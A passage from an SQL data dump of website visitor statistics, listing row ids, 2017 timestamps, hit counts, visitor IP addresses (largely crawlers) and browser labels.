,'217.69.133.203','other'),(125404,1498311391,1,1,0,0,'164.132.161.56','other'),(125405,1498311519,1,1,0,0,'164.132.161.38','other'),(125406,1498311594,1,1,0,0,'164.132.162.159','other'),(125407,1498312551,1,1,0,0,'51.255.65.4','other'),(125408,1498312760,1,1,0,0,'51.255.65.43','other'),(125409,1498313073,1,1,0,0,'164.132.161.46','other'),(125410,1498313079,1,1,0,0,'164.132.161.37','other'),(125411,1498313514,1,1,0,0,'51.255.65.94','other'),(125412,1498313598,1,1,0,0,'91.196.178.131','chrome'),(125413,1498313687,1,1,0,0,'91.196.178.34','chrome'),(125414,1498313823,1,1,0,0,'51.255.65.76','other'),(125415,1498313952,1,1,0,0,'40.77.167.60','other'),(125416,1498314025,1,1,0,0,'217.182.132.174','other'),(125417,1498314108,1,1,0,0,'217.182.132.83','other'),(125418,1498314745,1,1,0,0,'5.255.253.73','other'),(125419,1498315507,1,1,0,0,'91.209.11.236','other'),(125420,1498315848,1,1,0,0,'66.249.75.30','chrome'),(125421,1498315942,1,1,0,0,'207.154.204.29','chrome'),(125422,1498316265,1,1,0,0,'137.74.207.159','other'),(125423,1498316790,1,1,0,0,'164.132.161.24','other'),(125424,1498316952,1,1,0,0,'40.77.167.60','other'),(125425,1498317042,1,1,0,0,'46.118.156.191','firefox'),(125426,1498317610,1,1,0,0,'217.182.132.17','other'),(125427,1498318043,1,1,0,0,'164.132.161.73','other'),(125428,1498318197,1,1,0,0,'164.132.161.57','other'),(125429,1498318423,2,2,0,0,'213.136.91.205','other'),(125430,1498318753,1,1,0,0,'8.29.198.27','other'),(125431,1498319071,1,1,0,0,'164.132.161.7','other'),(125432,1498319185,2,2,0,0,'91.209.11.236','other'),(125433,1498319437,1,1,0,0,'51.255.71.112','other'),(125434,1498319909,1,1,0,0,'180.76.15.158','other'),(125435,1498320686,1,1,0,0,'91.196.178.165','chrome'),(125436,1498320710,1,1,0,0,'66.249.69.71','chrome'),(125437,1498320748,2,2,0,0,'91.209.11.236','other'),(125438,1498321292,1,1,0,0,'164.132.161.45','other'),(125439,1498322415,1,0,1,0,'66.249.69.73',''),(125440,1498322834,1,1,0,0,'91.209.11.236','other'),(125441,1498322903,1,1,0,0,'164.132.161.63','other'),(125442,1498323491,1,1,0,0,'217.182.132.188','other'),(125443,1498323667,1,1,0,0,'51.255.71.117','other'),(125444,1498323669,1,1,0,0,'217.182.132.25','other'),(125445,1498323874,1,1,0,0,'164.132.161.55','other'),(125446,1498324311,1,1,0,0,'164.132.161.80','other'),(125447,1498324552,1,1,0,0,'185.137.18.49','chrome'),(125448,1498325732,1,0,1,0,'66.249.75.30',''),(125449,1498326457,1,1,0,0,'164.132.161.44','other'),(125450,1498327580,1,1,0,0,'164.132.162.159','other'),(125451,1498327761,1,1,0,0,'217.182.132.83','other'),(125452,1498328062,1,1,0,0,'51.255.65.83','other'),(125453,1498329115,1,1,0,0,'137.74.207.159','other'),(125454,1498329501,1,1,0,0,'164.132.162.157','other'),(125455,1498329581,1,1,0,0,'8.29.198.27','other'),(125456,1498329610,1,1,0,0,'51.255.65.77','other'),(125457,1498329687,1,1,0,0,'40.77.167.60','other'),(125458,1498330064,1,1,0,0,'46.133.16.98','chrome'),(125459,1498330171,1,1,0,0,'87.250.224.21','other'),(125460,1498330283,1,1,0,0,'164.132.161.70','other'),(125461,1498331230,1,1,0,0,'51.255.71.133','other'),(125462,1498331488,1,1,0,0,'217.182.132.51','other'),(125463,1498331696,1,1,0,0,'66.249.75.28','chrome'),(125464,1498331703,1,0,1,0,'66.249.75.30',''),(125465,1498331947,1,0,1,0,'66.249.75.29',''),(125466,1498332548,1,1,0,0,'164.132.161.44','other'),(125467,1498332584,1,1,0,0,'180.76.15.143','other'),(125468,1498332768,1,1,0,0,'51.255.65.29','other'),(125469,1498333064,1,1,0,0,'157.55.39.160','other'),(125470,1498333614,1,1,0,0,'51.255.65.83','other'),(125471,1498333649,1,1,0,0,'217.182.132.177','other'),(125472,1498333652,1,1,0,0,'51.255.71.115','other'),(125473,1498333666,1,1,0,0,'91.196.178.33','chrome'),(125474,1498334021,1,0,1,0,'66.249.76.93',''),(125475,1498334157,1,1,0,0,'157.55.39.160','other'),(125476,1498334193,1,1,0,0,'51.255.65.90','other'),(125477,1498334375,1,1,0,0,'164.132.161.73','other'),(125478,1498335428,1,0,1,0,'66.249.76.107',''),(125479,1498335530,1,0,1,0,'66.249.76.108',''),(125480,1498335672,1,1,0,0,'51.255.65.28','other'),(125481,1498335816,1,1,0,0,'51.255.71.126','other'),(125482,1498336870,1,0,1,0,'68.180.230.48',''),(125483,1498337091,1,1,0,0,'91.196.178.162','other'),(125484,1498337204,1,1,0,0,'137.74.207.159','other'),(125485,1498337225,1,1,0,0,'164.132.161.44','other'),(125486,1498337437,1,1,0,0,'46.101.172.242','other'),(125487,1498337466,1,1,0,0,'51.255.65.74','other'),(125488,1498337502,1,1,0,0,'51.255.65.35','other'),(125489,1498337817,1,1,0,0,'164.132.161.50','other'),(125490,1498338107,1,1,0,0,'46.133.44.73','other'),(125491,1498338212,1,1,0,0,'217.182.132.37','other'),(125492,1498338749,1,1,0,0,'91.196.178.162','other'),(125493,1498339184,1,1,0,0,'157.55.39.221','other'),(125494,1498339667,3,0,3,0,'66.249.76.89',''),(125495,1498340063,1,0,1,0,'66.249.66.76',''),(125496,1498340170,1,1,0,0,'217.182.132.183','other'),(125497,1498340407,1,1,0,0,'8.29.198.25','other'),(125498,1498340464,1,0,1,0,'66.249.76.91',''),(125499,1498340724,1,1,0,0,'5.255.253.54','other'),(125500,1498340741,1,1,0,0,'51.255.71.113','other'),(125501,1498340750,1,1,0,0,'217.182.132.152','other'),(125502,1498341028,1,1,0,0,'164.132.161.32','other'),(125503,1498341137,1,1,0,0,'217.182.132.174','other'),(125504,1498341158,1,1,0,0,'164.132.161.9','other'),(125505,1498341456,1,1,0,0,'46.229.168.70','other'),(125506,1498341488,4,4,0,0,'46.229.168.68','other'),(125507,1498341492,3,3,0,0,'46.229.168.80','other'),(125508,1498341516,4,4,0,0,'46.229.168.65','other'),(125509,1498341528,2,2,0,0,'46.229.168.71','other'),(125510,1498341588,2,2,0,0,'46.229.168.78','other'),(125511,1498341610,1,1,0,0,'46.229.168.77','other'),(125512,1498341674,2,2,0,0,'46.229.168.72','other'),(125513,1498341698,1,1,0,0,'51.255.71.127','other'),(125514,1498341711,5,5,0,0,'46.229.168.69','other'),(125515,1498341756,1,1,0,0,'46.229.168.75','other'),(125516,1498341761,1,1,0,0,'217.182.132.86','other'),(125517,1498341819,2,2,0,0,'46.229.168.76','other'),(125518,1498341838,1,1,0,0,'46.229.168.74','other'),(125519,1498341887,1,0,1,0,'66.249.76.91',''),(125520,1498341892,1,1,0,0,'46.229.168.66','other'),(125521,1498341925,1,1,0,0,'157.55.39.221','other'),(125522,1498342719,1,1,0,0,'51.255.65.2','other'),(125523,1498342792,1,1,0,0,'51.255.65.86','other'),(125524,1498342877,1,1,0,0,'66.249.76.91','chrome'),(125525,1498343048,1,1,0,0,'40.77.167.60','other'),(125526,1498344462,1,1,0,0,'51.255.65.50','other'),(125527,1498344655,1,1,0,0,'164.132.162.153','other'),(125528,1498344981,1,1,0,0,'51.255.65.83','other'),(125529,1498345055,1,0,1,0,'66.249.76.108',''),(125530,1498345168,1,1,0,0,'217.182.132.50','other'),(125531,1498345383,1,1,0,0,'217.182.132.52','other'),(125532,1498346101,1,1,0,0,'217.182.132.93','other'),(125533,1498346143,1,1,0,0,'217.182.132.179','other'),(125534,1498346577,2,0,2,0,'66.249.76.91',''),(125535,1498346783,1,1,0,0,'51.255.65.95','other'),(125536,1498347135,1,1,0,0,'66.249.76.93','chrome'),(125537,1498348076,1,0,1,0,'66.249.66.155',''),(125538,1498348156,1,1,0,0,'217.69.133.3','other'),(125539,1498348271,1,0,1,0,'66.249.75.30',''),(125540,1498348548,1,1,0,0,'164.132.161.44','other'),(125541,1498349763,1,1,0,0,'164.132.161.25','other'),(125542,1498349861,1,1,0,0,'164.132.161.60','other'),(125543,1498350391,1,1,0,0,'180.76.15.141','other'),(125544,1498350415,1,1,0,0,'217.182.132.65','other'),(125545,1498351185,1,1,0,0,'217.182.132.76','other'),(125546,1498351219,1,1,0,0,'137.74.207.110','other'),(125547,1498351227,1,1,0,0,'8.29.198.27','other'),(125548,1498351306,1,1,0,0,'66.249.76.107','chrome'),(125549,1498351568,1,1,0,0,'66.249.76.91','chrome'),(125550,1498351813,1,1,0,0,'46.42.168.245','msie'),(125551,1498352224,1,1,0,0,'51.255.65.92','other'),(125552,1498352262,1,0,1,0,'66.249.76.109',''),(125553,1498352277,1,1,0,0,'137.74.207.188','other'),(125554,1498352635,1,1,0,0,'51.255.65.12','other'),(125555,1498353090,1,0,1,0,'66.249.76.108',''),(125556,1498353791,1,1,0,0,'217.69.133.4','other'),(125557,1498354049,1,1,0,0,'217.182.132.192','other'),(125558,1498354461,1,1,0,0,'164.132.161.75','other'),(125559,1498354573,1,0,1,0,'66.249.76.109',''),(125560,1498354711,1,0,1,0,'66.249.76.108',''),(125561,1498355658,1,1,0,0,'164.132.161.60','other'),(125562,1498355879,1,1,0,0,'51.255.65.76','other'),(125563,1498355935,1,1,0,0,'164.132.161.27','other'),(125564,1498356258,1,1,0,0,'164.132.161.16','other'),(125565,1498356524,1,1,0,0,'217.182.132.82','other'),(125566,1498357009,1,0,1,0,'66.249.76.89',''),(125567,1498357692,1,1,0,0,'164.132.162.153','other'),(125568,1498357824,1,1,0,0,'217.182.132.81','other'),(125569,1498358289,1,1,0,0,'51.255.65.76','other'),(125570,1498358520,1,1,0,0,'217.182.132.88','other'),(125571,1498358522,1,1,0,0,'164.132.161.15','other'),(125572,1498358528,1,0,1,0,'66.249.76.108',''),(125573,1498358720,1,0,1,0,'66.249.76.91',''),(125574,1498359054,1,1,0,0,'51.255.71.131','other'),(125575,1498359153,1,1,0,0,'137.74.207.170','other'),(125576,1498359929,1,0,1,0,'66.249.76.91',''),(125577,1498360422,1,1,0,0,'217.182.132.21','other'),(125578,1498360424,1,1,0,0,'216.244.66.237','other'),(125579,1498360679,1,1,0,0,'51.255.65.34','other'),(125580,1498360804,1,0,1,0,'66.249.66.155',''),(125581,1498360887,1,1,0,0,'66.249.76.93','chrome'),(125582,1498361125,1,1,0,0,'176.31.231.10','other'),(125583,1498361395,1,1,0,0,'164.132.161.52','other'),(125584,1498361742,1,1,0,0,'51.255.71.115','other'),(125585,1498361772,1,1,0,0,'217.182.132.84','other'),(125586,1498362047,1,1,0,0,'8.29.198.26','other'),(125587,1498362100,1,1,0,0,'217.182.132.67','other'),(125588,1498362402,1,1,0,0,'51.255.65.12','other'),(125589,1498362982,1,1,0,0,'51.255.65.44','other'),(125590,1498363005,1,1,0,0,'51.255.65.6','other'),(125591,1498363292,1,1,0,0,'164.132.161.54','other'),(125592,1498363998,1,1,0,0,'164.132.161.90','other'),(125593,1498364316,1,0,1,0,'66.249.76.107',''),(125594,1498364319,1,1,0,0,'137.74.207.119','other'),(125595,1498364793,1,1,0,0,'91.196.178.162','other'),(125596,1498364980,1,0,1,0,'68.180.230.48',''),(125597,1498365080,1,1,0,0,'164.132.162.153','other'),(125598,1498365303,1,1,0,0,'51.255.65.94','other'),(125599,1498365661,1,1,0,0,'217.182.132.37','other'),(125600,1498366028,1,0,1,0,'66.249.76.109',''),(125601,1498366033,1,1,0,0,'164.132.162.157','other'),(125602,1498366166,1,1,0,0,'66.249.76.109','chrome'),(125603,1498366748,1,1,0,0,'51.255.71.127','other'),(125604,1498366834,2,2,0,0,'51.255.65.3','other'),(125605,1498366938,1,1,0,0,'51.255.65.53','other'),(125606,1498366986,1,1,0,0,'51.255.65.2','other'),(125607,1498367739,1,1,0,0,'164.132.161.6','other'),(125608,1498367912,1,0,1,0,'66.249.76.93',''),(125609,1498368338,1,1,0,0,'217.182.132.179','other'),(125610,1498368489,1,1,0,0,'164.132.161.81','other'),(125611,1498368678,1,1,0,0,'217.182.132.19','other'),(125612,1498369161,1,0,1,0,'66.249.76.107',''),(125613,1498369186,1,1,0,0,'164.132.161.20','other'),(125614,1498369654,1,1,0,0,'157.55.39.221','other'),(125615,1498370135,1,1,0,0,'51.255.65.33','other'),(125616,1498370714,1,1,0,0,'164.132.161.97','other'),(125617,1498370757,1,1,0,0,'164.132.161.13','other'),(125618,1498371080,1,0,1,0,'66.249.66.74',''),(125619,1498371121,1,1,0,0,'217.69.133.194','other'),(125620,1498371221,1,1,0,0,'217.182.132.82','other'),(125621,1498371309,1,0,1,0,'66.249.76.89',''),(125622,1498371914,1,1,0,0,'164.132.161.32','other'),(125623,1498371970,1,0,1,0,'66.249.76.93',''),(125624,1498372095,1,1,0,0,'164.132.162.160','other'),(125625,1498372700,1,1,0,0,'46.188.29.153','chrome'),(125626,1498372877,1,1,0,0,'8.29.198.25','other'),(125627,1498373404,1,1,0,0,'217.182.132.69','other'),(125628,1498373753,1,1,0,0,'51.255.71.122','other'),(125629,1498373796,1,0,1,0,'66.249.69.73',''),(125630,1498373863,1,0,1,0,'66.249.76.107',''),(125631,1498374317,1,1,0,0,'217.182.132.87','other'),(125632,1498375085,1,1,0,0,'164.132.161.73','other'),(125633,1498375121,1,1,0,0,'164.132.161.68','other'),(125634,1498375659,1,0,1,0,'66.249.66.76',''),(125635,1498375718,1,1,0,0,'164.132.161.65','other'),(125636,1498375809,1,0,1,0,'66.249.66.74',''),(125637,1498375939,1,1,0,0,'164.132.162.160','other'),(125638,1498376006,1,0,1,0,'66.249.76.108',''),(125639,1498376075,1,1,0,0,'164.132.161.31','other'),(125640,1498376292,1,1,0,0,'162.210.196.100','other'),(125641,1498377403,1,0,1,0,'66.249.69.73',''),(125642,1498377445,1,0,1,0,'66.249.66.74',''),(125643,1498377738,1,1,0,0,'217.182.132.24','other'),(125644,1498377796,1,1,0,0,'66.249.76.108','chrome'),(125645,1498378089,1,1,0,0,'217.182.132.152','other'),(125646,1498378133,1,1,0,0,'164.132.164.180','other'),(125647,1498378644,1,1,0,0,'217.182.132.79','other'),(125648,1498378678,1,1,0,0,'51.255.65.17','other'),(125649,1498379710,1,0,1,0,'66.249.69.67',''),(125650,1498380929,1,1,0,0,'51.255.65.13','other'),(125651,1498380931,1,1,0,0,'164.132.161.64','other'),(125652,1498381972,1,1,0,0,'217.182.132.192','other'),(125653,1498382088,1,1,0,0,'178.92.171.208','chrome'),(125654,1498382293,2,2,0,0,'91.209.11.236','other'),(125655,1498382908,1,1,0,0,'137.74.207.109','other'),(125656,1498383021,1,1,0,0,'51.255.65.67','other'),(125657,1498383119,1,1,0,0,'51.255.65.10','other'),(125658,1498383131,1,1,0,0,'217.182.132.75','other'),(125659,1498383207,1,1,0,0,'51.255.71.125','other'),(125660,1498383387,1,0,1,0,'66.249.76.89',''),(125661,1498383501,1,1,0,0,'51.255.65.16','other'),(125662,1498383614,2,2,0,0,'91.209.11.236','other'),(125663,1498383703,1,1,0,0,'8.29.198.26','other'),(125664,1498383814,1,0,1,0,'66.249.76.108',''),(125665,1498384639,1,1,0,0,'217.69.133.2','other'),(125666,1498385708,1,1,0,0,'164.132.161.85','other'),(125667,1498386336,1,1,0,0,'217.182.132.153','other'),(125668,1498386403,1,1,0,0,'51.255.65.25','other'),(125669,1498386487,1,1,0,0,'217.182.132.183','other'),(125670,1498387218,1,0,1,0,'66.249.76.112',''),(125671,1498387592,1,1,0,0,'51.255.65.2','other'),(125672,1498387763,1,1,0,0,'217.182.132.190','other'),(125673,1498387812,1,1,0,0,'51.255.65.62','other'),(125674,1498388049,1,1,0,0,'137.74.207.119','other'),(125675,1498388156,1,1,0,0,'217.182.132.25','other'),(125676,1498388512,1,0,1,0,'66.249.66.155',''),(125677,1498388771,1,1,0,0,'164.132.161.93','other'),(125678,1498388833,1,1,0,0,'217.182.132.77','other'),(125679,1498389395,1,1,0,0,'157.55.39.191','other'),(125680,1498389423,1,1,0,0,'51.255.65.8','other'),(125681,1498389495,1,1,0,0,'217.182.132.185','other'),(125682,1498390134,1,1,0,0,'217.182.132.30','other'),(125683,1498390185,1,0,1,0,'66.249.75.30',''),(125684,1498390490,1,1,0,0,'66.249.69.71','chrome'),(125685,1498390667,2,2,0,0,'91.209.11.236','other'),(125686,1498390847,1,1,0,0,'164.132.161.60','other'),(125687,1498390872,1,0,1,0,'66.249.76.131',''),(125688,1498390900,1,1,0,0,'216.244.66.237','other'),(125689,1498391012,1,0,1,0,'66.249.76.112',''),(125690,1498391623,1,1,0,0,'40.77.167.60','other'),(125691,1498391777,1,1,0,0,'51.255.71.120','other'),(125692,1498391866,1,1,0,0,'66.249.76.113','chrome'),(125693,1498392068,1,1,0,0,'217.182.132.192','other'),(125694,1498392438,1,1,0,0,'164.132.161.42','other'),(125695,1498392783,1,1,0,0,'5.255.253.54','other'),(125696,1498392843,1,1,0,0,'51.255.71.110','other'),(125697,1498393182,1,1,0,0,'51.255.65.89','other'),(125698,1498393243,1,1,0,0,'137.74.207.159','other'),(125699,1498393786,1,0,1,0,'66.249.76.113',''),(125700,1498394013,12,12,0,0,'208.43.225.84','other'),(125701,1498394022,17,17,0,0,'208.43.225.85','other'),(125702,1498394238,1,1,0,0,'217.182.132.35','other'),(125703,1498394309,1,1,0,0,'51.255.71.132','other'),(125704,1498394532,1,1,0,0,'8.29.198.25','other'),(125705,1498394623,1,1,0,0,'217.182.132.72','other'),(125706,1498395119,1,0,1,0,'68.180.230.48',''),(125707,1498395764,1,0,1,0,'66.249.76.112',''),(125708,1498395958,1,1,0,0,'91.196.178.168','chrome'),(125709,1498396251,1,1,0,0,'51.255.65.25','other'),(125710,1498396756,1,1,0,0,'217.182.132.68','other'),(125711,1498397415,1,1,0,0,'51.255.65.43','other'),(125712,1498397684,1,1,0,0,'66.249.66.75','chrome'),(125713,1498397861,1,1,0,0,'51.255.65.66','other'),(125714,1498397962,1,1,0,0,'188.32.244.88','other'),(125715,1498398108,1,1,0,0,'66.249.76.114','chrome'),(125716,1498398212,1,1,0,0,'66.249.76.113','chrome'),(125717,1498398494,1,1,0,0,'164.132.161.10','other'),(125718,1498398621,1,1,0,0,'91.196.178.71','chrome'),(125719,1498398874,1,1,0,0,'164.132.161.22','other'),(125720,1498398893,1,1,0,0,'217.182.132.149','other'),(125721,1498398990,1,1,0,0,'217.182.132.96','other'),(125722,1498399594,1,1,0,0,'217.182.132.190','other'),(125723,1498399616,1,1,0,0,'91.196.178.71','chrome'),(125724,1498399717,1,1,0,0,'66.249.76.131','chrome'),(125725,1498400584,1,1,0,0,'51.255.65.18','other'),(125726,1498400941,1,1,0,0,'164.132.161.95','other'),(125727,1498400957,1,1,0,0,'217.182.132.75','other'),(125728,1498401187,1,0,1,0,'66.249.66.76',''),(125729,1498401298,1,1,0,0,'66.249.66.155','chrome'),(125730,1498401371,1,1,0,0,'137.74.203.194','other'),(125731,1498401373,2,2,0,0,'66.249.76.113','chrome'),(125732,1498401399,1,0,1,0,'66.249.66.74',''),(125733,1498401419,1,1,0,0,'66.249.76.112','chrome'),(125734,1498401464,1,1,0,0,'66.249.66.76','chrome'),(125735,1498401540,2,1,1,0,'66.249.76.131',''),(125736,1498402408,2,0,2,0,'66.249.66.74',''),(125737,1498402541,1,0,1,0,'66.249.76.112',''),(125738,1498402836,1,1,0,0,'51.255.71.123','other'),(125739,1498402911,1,1,0,0,'217.182.132.80','other'),(125740,1498403014,1,1,0,0,'217.182.132.186','other'),(125741,1498403027,1,1,0,0,'137.74.207.101','other'),(125742,1498403179,1,1,0,0,'51.255.65.35','other'),(125743,1498403246,1,1,0,0,'217.182.132.37','other'),(125744,1498403542,1,1,0,0,'164.132.161.63','other'),(125745,1498403760,1,1,0,0,'51.255.65.50','other'),(125746,1498403858,1,1,0,0,'164.132.162.160','other'),(125747,1498403879,1,1,0,0,'164.132.161.16','other'),(125748,1498403902,1,1,0,0,'51.255.65.58','other'),(125749,1498403951,1,0,1,0,'66.249.76.114',''),(125750,1498404606,1,1,0,0,'51.255.65.84','other'),(125751,1498404617,1,1,0,0,'217.182.132.80','other'),(125752,1498404678,1,1,0,0,'51.255.71.133','other'),(125753,1498404903,1,1,0,0,'164.132.161.58','other'),(125754,1498404943,1,1,0,0,'164.132.161.13','other'),(125755,1498405351,1,1,0,0,'8.29.198.25','other'),(125756,1498405447,1,0,1,0,'66.249.76.114',''),(125757,1498405620,1,1,0,0,'137.74.201.99','other'),(125758,1498405647,1,1,0,0,'66.249.76.131','chrome'),(125759,1498405842,68,68,0,0,'54.224.255.158','other'),(125760,1498406261,1,1,0,0,'164.132.161.82','other'),(125761,1498406781,1,1,0,0,'180.76.15.8','other'),(125762,1498406942,1,0,1,0,'66.249.76.113',''),(125763,1498407109,1,1,0,0,'217.182.132.85','other'),(125764,1498407294,1,1,0,0,'164.132.161.44','other'),(125765,1498407555,1,1,0,0,'217.69.133.5','other'),(125766,1498408144,1,0,1,0,'66.249.76.131',''),(125767,1498408163,1,1,0,0,'164.132.161.32','other'),(125768,1498409383,8,0,8,0,'68.180.230.48',''),(125769,1498409848,1,1,0,0,'178.92.171.208','chrome'),(125770,1498410385,2,0,2,0,'68.180.230.48',''),(125771,1498410403,1,1,0,0,'40.77.167.60','other'),(125772,1498410613,1,1,0,0,'164.132.161.61','other'),(125773,1498410789,1,1,0,0,'217.182.132.87','other'),(125774,1498411152,1,1,0,0,'217.69.133.2','other'),(125775,1498411259,1,1,0,0,'157.55.39.191','other'),(125776,1498411309,1,1,0,0,'164.132.161.2','other'),(125777,1498411736,1,1,0,0,'66.249.76.151','chrome'),(125778,1498411834,1,1,0,0,'151.80.27.118','other'),(125779,1498412386,1,0,1,0,'66.249.66.75',''),(125780,1498412561,1,1,0,0,'51.255.65.16','other'),(125781,1498412593,1,1,0,0,'51.255.65.15','other'),(125782,1498412986,1,1,0,0,'164.132.161.41','other'),(125783,1498413137,1,1,0,0,'51.255.65.29','other'),(125784,1498413188,1,1,0,0,'164.132.161.70','other'),(125785,1498413192,1,1,0,0,'217.182.132.174','other'),(125786,1498413780,1,1,0,0,'51.255.65.15','other'),(125787,1498413827,1,1,0,0,'217.182.132.171','other'),(125788,1498414142,1,0,1,0,'66.249.76.112',''),(125789,1498414412,1,1,0,0,'164.132.162.157','other'),(125790,1498414512,1,1,0,0,'217.182.132.83','other'),(125791,1498414964,1,1,0,0,'62.216.62.101','chrome'),(125792,1498415027,1,1,0,0,'217.182.132.7','other'),(125793,1498415310,1,1,0,0,'51.255.65.45','other'),(125794,1498415346,1,1,0,0,'66.249.66.76','chrome'),(125795,1498415536,1,1,0,0,'51.255.71.122','other'),(125796,1498415587,1,1,0,0,'51.255.65.73','other'),(125797,1498415613,1,1,0,0,'164.132.161.64','other'),(125798,1498415940,1,1,0,0,'164.132.161.35','other'),(125799,1498416052,1,1,0,0,'51.255.65.7','other'),(125800,1498416168,1,1,0,0,'8.29.198.26','other'),(125801,1498416513,1,1,0,0,'66.249.76.131','chrome'),(125802,1498416521,1,1,0,0,'217.69.133.5','other'),(125803,1498416951,1,1,0,0,'91.196.178.38','chrome'),(125804,1498417661,1,0,1,0,'66.249.66.74',''),(125805,1498417714,1,1,0,0,'164.132.161.5','other'),(125806,1498417758,1,1,0,0,'217.182.132.23','other'),(125807,1498418147,1,1,0,0,'164.132.161.78','other'),(125808,1498418628,1,1,0,0,'207.46.13.91','other'),(125809,1498419191,1,1,0,0,'66.249.69.73','chrome'),(125810,1498419216,1,1,0,0,'91.196.178.40','chrome'),(125811,1498419357,1,0,1,0,'66.249.66.74',''),(125812,1498420208,1,1,0,0,'66.249.76.114','chrome'),(125813,1498420244,1,1,0,0,'217.182.132.34','other'),(125814,1498420255,1,1,0,0,'51.255.65.49','other'),(125815,1498420404,1,1,0,0,'51.255.65.33','other'),(125816,1498420430,1,1,0,0,'51.255.71.117','other'),(125817,1498420948,1,0,1,0,'68.180.230.48',''),(125818,1498420994,1,1,0,0,'51.255.71.128','other'),(125819,1498421655,1,1,0,0,'164.132.161.53','other'),(125820,1498421851,1,1,0,0,'217.182.132.86','other'),(125821,1498422066,1,1,0,0,'51.255.65.97','other'),(125822,1498422416,1,1,0,0,'66.249.75.28','chrome'),(125823,1498422559,1,1,0,0,'51.255.65.4','other'),(125824,1498423096,1,0,1,0,'68.180.230.48',''),(125825,1498424058,1,1,0,0,'5.83.19.15','firefox'),(125826,1498424201,1,1,0,0,'178.154.200.70','other'),(125827,1498425341,1,1,0,0,'51.255.65.19','other'),(125828,1498425389,1,1,0,0,'157.55.39.160','other'),(125829,1498425491,1,1,0,0,'217.182.132.193','other'),(125830,1498425557,1,1,0,0,'91.196.178.66','chrome'),(125831,1498425845,1,1,0,0,'91.196.178.162','other'),(125832,1498426132,1,1,0,0,'46.133.195.116','other'),(125833,1498426186,1,1,0,0,'46.133.252.65','other'),(125834,1498426419,1,1,0,0,'51.255.65.36','other'),(125835,1498426952,1,1,0,0,'157.55.39.191','other'),(125836,1498426984,1,1,0,0,'8.29.198.26','other'),(125837,1498427072,1,0,1,0,'68.180.230.48',''),(125838,1498427091,1,1,0,0,'51.255.65.30','other'),(125839,1498427138,1,1,0,0,'217.182.132.15','other'),(125840,1498427419,1,1,0,0,'164.132.161.12','other'),(125841,1498427679,1,1,0,0,'164.132.161.17','other'),(125842,1498427736,1,1,0,0,'51.255.65.55','other'),(125843,1498428940,1,1,0,0,'141.8.142.50','other'),(125844,1498428998,1,1,0,0,'51.255.71.130','other'),(125845,1498429035,1,1,0,0,'91.196.178.66','chrome'),(125846,1498429113,1,1,0,0,'164.132.161.84','other'),(125847,1498429332,1,1,0,0,'164.132.161.47','other'),(125848,1498430000,1,1,0,0,'176.14.244.114','msie'),(125849,1498430002,1,1,0,0,'188.32.176.249','msie'),(125850,1498430027,1,1,0,0,'188.255.17.110','msie'),(125851,1498430240,1,1,0,0,'66.249.76.112','chrome'),(125852,1498430285,1,0,1,0,'66.249.76.131',''),(125853,1498430516,1,1,0,0,'217.182.132.180','other'),(125854,1498431361,1,0,1,0,'68.180.230.48',''),(125855,1498431973,1,1,0,0,'51.255.65.20','other'),(125856,1498432362,1,1,0,0,'93.158.152.14','other'),(125857,1498432373,1,1,0,0,'51.255.65.60','other'),(125858,1498433408,1,1,0,0,'164.132.161.45','other'),(125859,1498433480,1,1,0,0,'217.182.132.149','other'),(125860,1498434095,1,1,0,0,'51.255.65.71','other'),(125861,1498434115,1,1,0,0,'51.255.71.116','other'),(125862,1498434258,1,1,0,0,'217.182.132.14','other'),(125863,1498434811,1,0,1,0,'68.180.230.48',''),(125864,1498435174,1,1,0,0,'51.255.65.81','other'),(125865,1498435733,2,0,2,0,'66.249.76.112',''),(125866,1498435838,1,1,0,0,'180.76.15.28','other'),(125867,1498435854,1,1,0,0,'217.182.132.179','other'),(125868,1498435963,2,2,0,0,'95.213.141.126','opera'),(125869,1498436007,1,1,0,0,'217.69.133.2','other'),(125870,1498436072,1,1,0,0,'164.132.161.49','other'),(125871,1498436564,1,1,0,0,'217.182.132.180','other'),(125872,1498437414,1,1,0,0,'178.92.171.208','chrome'),(125873,1498437461,1,1,0,0,'164.132.161.71','other'),(125874,1498437596,28,28,0,0,'104.192.6.139','other'),(125875,1498437771,1,1,0,0,'217.182.132.92','other'),(125876,1498437808,1,1,0,0,'8.29.198.26','other'),(125877,1498437886,1,1,0,0,'137.74.203.194','other'),(125878,1498438578,1,1,0,0,'51.255.65.66','other'),(125879,1498438591,1,1,0,0,'164.132.161.71','other'),(125880,1498439835,1,1,0,0,'164.132.161.42','other'),(125881,1498440422,1,1,0,0,'217.182.132.240','other'),(125882,1498440886,1,1,0,0,'51.255.65.66','other'),(125883,1498440890,1,0,1,0,'68.180.230.48',''),(125884,1498441243,1,1,0,0,'217.182.132.88','other'),(125885,1498441554,1,1,0,0,'51.255.65.84','other'),(125886,1498441584,1,1,0,0,'217.182.132.53','other'),(125887,1498441746,1,1,0,0,'37.146.160.149','msie'),(125888,1498441799,1,1,0,0,'51.255.65.72','other'),(125889,1498442061,1,1,0,0,'51.255.65.39','other'),(125890,1498442080,1,1,0,0,'164.132.161.65','other'),(125891,1498442082,1,1,0,0,'51.255.65.44','other'),(125892,1498442881,1,1,0,0,'40.77.167.2','other'),(125893,1498443059,1,1,0,0,'217.182.132.149','other'),(125894,1498443958,1,0,1,0,'68.180.230.48',''),(125895,1498444040,1,1,0,0,'217.182.132.71','other'),(125896,1498444097,1,1,0,0,'51.255.65.68','other'),(125897,1498444136,1,1,0,0,'51.255.65.54','other'),(125898,1498444199,1,1,0,0,'217.182.132.33','other'),(125899,1498444391,1,1,0,0,'54.165.59.7','other'),(125900,1498445125,1,0,1,0,'68.180.230.48',''),(125901,1498445376,1,1,0,0,'164.132.162.154','other'),(125902,1498445740,1,1,0,0,'164.132.161.6','other'),(125903,1498445976,1,1,0,0,'51.255.71.130','other'),(125904,1498446457,1,1,0,0,'164.132.162.154','other'),(125905,1498446511,1,1,0,0,'217.182.132.14','other'),(125906,1498446729,1,1,0,0,'51.255.65.32','other'),(125907,1498447064,1,1,0,0,'164.132.161.93','other'),(125908,1498448118,1,1,0,0,'51.255.65.43','other'),(125909,1498448171,1,1,0,0,'40.77.167.2','other'),(125910,1498448198,1,1,0,0,'51.255.65.95','other'),(125911,1498448228,1,1,0,0,'164.132.161.56','other'),(125912,1498448587,1,1,0,0,'217.182.132.146','other'),(125913,1498448631,1,1,0,0,'8.29.198.25','other'),(125914,1498449185,1,0,1,0,'66.249.76.112',''),(125915,1498449242,1,0,1,0,'66.249.76.114',''),(125916,1498449806,1,1,0,0,'164.132.161.58','other'),(125917,1498449832,1,1,0,0,'51.255.65.9','other'),(125918,1498450332,1,1,0,0,'164.132.161.24','other'),(125919,1498451120,1,1,0,0,'217.182.132.147',